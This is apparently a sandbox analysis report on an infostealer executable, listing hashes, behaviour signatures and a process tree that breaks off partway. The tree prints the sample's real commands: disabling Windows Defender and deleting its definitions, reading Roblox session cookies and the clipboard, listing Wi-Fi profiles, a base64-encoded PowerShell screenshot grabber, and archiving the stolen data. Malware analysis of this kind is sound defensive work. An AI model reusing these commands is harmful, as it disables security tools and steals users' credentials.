Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-fr
  • resource tags

    arch:x64arch:x86image:win10-20240611-frlocale:fr-fros:windows10-1703-x64systemwindows
  • submitted
    26-06-2024 13:10

General

  • Target

    Built.exe

  • Size

    224.0MB

  • MD5

    f3c0061c28b07f1ccada3dca9755b304

  • SHA1

    dd41b3edb8abf9a0147695b7dd7f285f8d5aef1e

  • SHA256

    77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71

  • SHA512

    1e804d2a9e5cac5c65ee93b0c30f36916f928e8e17aa339e5db7778725bcc42ba4318f28d30eca15bc8671eea6289602e92ccd9a45b6f4f86f8d05b9e56a5707

  • SSDEEP

    196608:HJq+sxft1urErvI9pWjgU1DEzx7sKLus1tPAkjUWlRHK0:0Xxft1urEUWjhEhnx1tl9K0

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4604
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:836
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:1736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4936
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3264
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:412
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5068
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1028
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2524
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4288
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5048
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3852
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2264
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2348
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:3784
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1416
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3300
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1204
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4452
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3548
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4820
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                3⤵
                  PID:3624
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    4⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4760
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  3⤵
                    PID:1840
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      4⤵
                      • Gathers system information
                      PID:2764
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    3⤵
                      PID:3956
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        4⤵
                          PID:3664
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:1168
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4172
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.cmdline"
                              5⤵
                                PID:1044
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC966.tmp" "c:\Users\Admin\AppData\Local\Temp\nwth3d11\CSCBD0D024427384C299BA7C176B2D0357A.TMP"
                                  6⤵
                                    PID:4424
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4400
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2992
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                  3⤵
                                    PID:2184
                                    • C:\Windows\system32\attrib.exe
                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                      4⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:3304
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:2188
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:776
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1644
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:4248
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2028
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4132
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:2100
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2572
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4980
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:4156
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:4988
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:2512
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                        3⤵
                                                          PID:1924
                                                          • C:\Windows\system32\getmac.exe
                                                            getmac
                                                            4⤵
                                                              PID:1796
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:4212
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4892
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:1324
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5072
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\YVl6C.zip" *"
                                                                3⤵
                                                                  PID:4532
                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\YVl6C.zip" *
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:2024
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                  3⤵
                                                                    PID:4608
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      4⤵
                                                                        PID:4424
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get Caption
                                                                        4⤵
                                                                          PID:5012
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                        3⤵
                                                                          PID:2776
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic computersystem get totalphysicalmemory
                                                                            4⤵
                                                                              PID:4604
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            3⤵
                                                                              PID:4900
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                4⤵
                                                                                  PID:4828
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                3⤵
                                                                                  PID:3440
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
